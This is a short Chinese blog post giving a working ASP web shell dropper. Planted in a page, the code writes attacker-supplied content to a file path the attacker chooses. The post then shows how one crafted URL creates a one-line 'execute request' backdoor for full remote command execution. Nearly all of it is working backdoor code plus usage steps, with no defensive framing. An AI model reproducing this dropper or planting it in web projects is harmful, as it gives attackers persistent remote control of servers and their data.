小马ASP

<% On Error Resume Next IF Request("action")="ocean" then set gl=server.CreateObJeCt("Adodb.Stream") gl.Open gl.Type=2 gl.CharSet="gb2312" gl.writetext request("shellcode") gl.SaveToFile server.mappath(request("shellpath")),2 gl.Close set gl=nothing response.redirect request("shellpath") end if %> -------------------------------------------------------------------------------- 使 用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?action=ocean& shellcode=<%25execute request("show")%25>&shellpath=obj.asp,那么我们就可以在与newslist.asp同目录下生成 一个obj.asp的文件,内容为“<%execute request("show")%>”,于是我们只要改变shellcode的内容,就可以得到一个shell.
posted @ 2012-07-15 21:28  adodo1  Views(185)  Comments(0Edit  收藏  举报